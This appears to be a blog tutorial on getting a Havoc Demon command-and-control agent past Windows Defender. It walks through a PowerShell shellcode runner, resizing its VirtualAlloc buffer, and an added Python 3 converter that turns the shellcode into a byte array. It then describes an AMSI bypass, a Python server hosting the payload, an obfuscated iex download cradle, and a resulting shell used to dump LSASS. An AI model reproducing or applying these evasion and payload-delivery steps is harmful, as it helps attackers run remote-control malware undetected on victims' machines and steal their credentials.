How to run Havoc agent through Windows Defender (2024)

Hi all! Today I will show a method to get a Havoc Demon agent past the latest version of Windows Defender, as of September 2024.

We will use offensive PowerShell: take a shellcode runner written in PowerShell and combine it with a working AMSI bypass so that the whole thing executes in memory.

I will use the following shellcode runner in PowerShell: https://github.com/dievus/PowerShellRunner/blob/main/runner.ps1

Now I will generate the shellcode for the Havoc agent (Demon) and save it to a file with a .bin extension.

Now we can use a Python 2 script to convert the .bin file into a PowerShell byte-array literal that can be pasted into the runner.ps1 script.

Then we copy this byte array into the $buf variable in runner.ps1.

However, if we simply run the script with our shellcode in it, it may fail. The most likely cause is that the runner reserves a fixed-size buffer that is smaller than the Demon shellcode, so not enough memory is allocated for the payload. That allocation happens in the $cucumbers variable, which calls the Windows API function VirtualAlloc.

According to the documentation, the second parameter of VirtualAlloc (dwSize) is the size of the region to allocate, in bytes. The kernel rounds it up to the next page boundary, but a value smaller than the payload means the subsequent copy runs past the end of the region.

So we move the $cucumbers line to right after our shellcode (so that $buf already exists when it runs) and set the second parameter of VirtualAlloc to the size of our shellcode. Passing $buf.Length instead of a hard-coded number keeps this correct every time the payload is regenerated. This ensures that enough memory is allocated for the code to execute successfully.
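As an added example (Python 3, not the Python 2 script used in the post and not part of dievus' runner), here is a converter that emits the $buf literal in the same comma-wrapped style as msfvenom's psh output, parses a pasted literal back so you can confirm runner.ps1 holds the .bin byte for byte, and reports the minimum dwSize for VirtualAlloc. The variable name buf and the page size are assumptions; the sample bytes in the test are constructed, not real shellcode.

```python
#!/usr/bin/env python3
"""bin2psh.py: turn a raw shellcode .bin into a PowerShell [Byte[]] literal.

Added example in Python 3; not the Python 2 script from the post and not part
of dievus' PowerShellRunner. Output mirrors msfvenom's "psh" style: 0x.. bytes
separated by commas, wrapped so that every line but the last ends with a comma,
which PowerShell treats as a line continuation inside an array literal.
"""
import re
import sys

PAGE_SIZE = 0x1000  # assumption: x86/x64 page size VirtualAlloc rounds dwSize up to


def ps_byte_array(data: bytes, var: str = "buf", per_line: int = 16) -> str:
    """Render data as '[Byte[]] $var = 0x..,0x..,...' with per_line bytes per line."""
    if not data:
        raise ValueError("shellcode is empty; check that the .bin was generated")
    if per_line < 1:
        raise ValueError("per_line must be >= 1")
    hexes = [f"0x{b:02x}" for b in data]
    rows = [",".join(hexes[i:i + per_line]) for i in range(0, len(hexes), per_line)]
    # ",\n" leaves a trailing comma on every row except the last (line continuation)
    return f"[Byte[]] ${var} = " + ",\n".join(rows)


def parse_ps_byte_array(text: str) -> bytes:
    """Inverse of ps_byte_array: recover the bytes from a pasted literal.

    Lines starting with '#' (PowerShell comments) are ignored. Use this to check
    that what ended up in runner.ps1 is identical to the .bin; a truncated or
    re-wrapped paste is a common reason the runner crashes besides dwSize.
    """
    body = "\n".join(ln for ln in text.splitlines() if not ln.lstrip().startswith("#"))
    return bytes(int(h, 16) for h in re.findall(r"0x([0-9a-fA-F]{2})", body))


def rounded_alloc_size(nbytes: int, page: int = PAGE_SIZE) -> int:
    """Bytes VirtualAlloc actually commits for dwSize=nbytes (rounded up to a page)."""
    return -(-nbytes // page) * page


def render(data: bytes, var: str = "buf") -> str:
    """The literal, preceded by a PowerShell comment stating the minimum dwSize."""
    n = len(data)
    literal = ps_byte_array(data, var)
    return (f"# {n} bytes; VirtualAlloc dwSize must be >= {n} "
            f"(pass ${var}.Length; the kernel rounds it to {rounded_alloc_size(n)})\n"
            f"{literal}")


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: bin2psh.py demon.bin > buf.ps1")
    with open(sys.argv[1], "rb") as fh:
        raw = fh.read()
    out = render(raw)
    assert parse_ps_byte_array(out) == raw  # round-trip self-check before printing
    print(out)
```

Paste the printed block over the existing $buf assignment in runner.ps1 and use $buf.Length as the second argument to VirtualAlloc; if the runner still fails, run parse_ps_byte_array over the pasted text and compare it to the .bin before blaming the allocation.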

I then test this on a Windows machine with antivirus protection disabled and make sure it works.

With Defender enabled, however, this is not enough: the Antimalware Scan Interface hands the script content to Defender before it runs, and the runner is detected.

I'll try to use a recent Antimalware Scan Interface (AMSI) bypass so that our runner can execute.

It worked! Now let's set up a Python server from which we will try to download our AMSI bypass along with our shellcode runner.

Note: you may need to obfuscate the iex (Invoke-Expression) download cradle, as that pattern is a common signature and may be blocked by Windows Defender.

And now we managed to get a shell in Havoc!

And we can even execute .NET binaries without problems, or dump LSASS.
